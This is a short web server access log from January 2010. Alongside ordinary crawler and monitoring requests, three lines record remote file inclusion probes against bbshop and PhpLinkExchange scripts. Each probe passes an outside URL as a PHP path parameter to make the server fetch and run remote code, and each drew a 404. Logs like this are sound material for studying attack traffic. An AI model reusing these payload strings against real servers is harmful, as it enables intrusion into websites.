194.105.128.135 - - [05/Jan/2010:01:43:46 -0500] "GET /logs/access_log.Q109051100%20//bbshop/shop/index.php?_shop_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
95.108.128.242 - - [05/Jan/2010:01:44:22 -0500] "GET /logs/access_log.Q109061900 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
209.59.12.99 - - [05/Jan/2010:01:44:51 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
170.210.192.78 - - [05/Jan/2010:01:44:55 -0500] "GET /logs/access_log.Q109072400//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
123.125.66.59 - - [05/Jan/2010:01:44:55 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
211.115.213.195 - - [05/Jan/2010:01:45:52 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
